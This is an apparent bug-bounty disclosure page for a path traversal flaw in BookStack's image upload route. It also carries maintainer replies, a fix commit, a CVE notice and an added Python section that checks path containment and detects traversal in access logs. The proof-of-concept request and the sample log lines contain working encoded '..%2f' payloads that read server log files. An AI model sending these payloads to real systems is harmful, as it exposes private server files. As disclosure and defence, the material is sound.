Path Traversal in bookstackapp/bookstack


Reported on

Oct 30th 2021


While reading the recent BookStack source code (85dc8d) I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.

Proof of Concept

GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


Log files whose paths are predictable can be read.
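As an added defender-side example (not code from the original report or from the BookStack project, and not the fix in commit 43830a), the block below shows the two controls a practitioner wants around an endpoint like /uploads/images/...: a containment check that URL-decodes the requested name, resolves it against the storage root and rejects anything that escapes that root, and a small detector that runs over web-server access log lines and flags requests whose decoded path contains a `..` segment. The base directory, the sample file names and the access log lines are constructed for the example; the decoder also handles double-encoded input, which goes beyond the single-encoded request in the proof of concept.

```python
import os
import re
from urllib.parse import unquote

# Constructed base directory for the example; no real BookStack install is assumed.
BASE_DIR = "/var/www/bookstack/public/uploads"


def decode_fully(segment: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so %2f and double-encoded %252f both become '/'."""
    prev, cur, rounds = None, segment, 0
    while cur != prev and rounds < max_rounds:
        prev, cur = cur, unquote(cur)
        rounds += 1
    return cur


def resolve_under_base(base_dir: str, requested: str):
    """Return the absolute path for `requested` if it stays inside `base_dir`, else None."""
    decoded = decode_fully(requested).replace("\\", "/")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments (and symlinks) before the containment check.
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:  # different drives on Windows, etc.
        return None
    return candidate


def is_safe_path(base_dir: str, requested: str) -> bool:
    return resolve_under_base(base_dir, requested) is not None


# Combined/common log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_traversal_requests(log_lines):
    """Return (ip, raw_path, status) for requests whose decoded path has a '..' segment."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_fully(m.group("path")).replace("\\", "/")
        segments = decoded.split("?", 1)[0].split("/")
        if ".." in segments:
            hits.append((m.group("ip"), m.group("path"), m.group("status")))
    return hits


# Constructed access log lines: the encoded request from the report, a normal image
# fetch, and a double-encoded variant of the same traversal.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [30/Oct/2021:10:15:02 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [30/Oct/2021:10:15:09 +0000] "GET /uploads/images/gallery/2021-10/cat.png HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Oct/2021:10:16:41 +0000] "GET /uploads/images/%252e%252e%252f%252e%252e%252flogs%252flaravel.log HTTP/1.1" 404 312 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for name in ("images/..%2f/..%2f/logs/laravel.log", "images/gallery/2021-10/cat.png"):
        print(f"{name!r}: {'allowed' if is_safe_path(BASE_DIR, name) else 'rejected'}")
    for ip, path, status in flag_traversal_requests(SAMPLE_ACCESS_LOG):
        print(f"traversal attempt from {ip}: {path} (status {status})")
```

The containment check should run on the server side regardless of any webserver-level protection, since (as the maintainer notes below) such protections only limit how far up the traversal reaches; the log detector is useful for a retrospective look at whether the endpoint was probed before the patch was deployed.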

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back 2 years ago
Dan Brown
2 years ago


Thank you so much again @theworstcomrade. Have verified on my own instance. Looks like there is some level of webserver protection that prevents this going too far up, which is something but still far from ideal.

I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.

Will mark this as valid and work into a patch to be deployed with the other fix.

Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.

Dan Brown validated this vulnerability 2 years ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dan Brown marked this as fixed with commit 43830a 2 years ago
Dan Brown has been awarded the fix bounty
ImageController.php#L38 has been validated
2 years ago


@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank you also for the bounty.

Jamie Slome
2 years ago

CVE published! 🎊
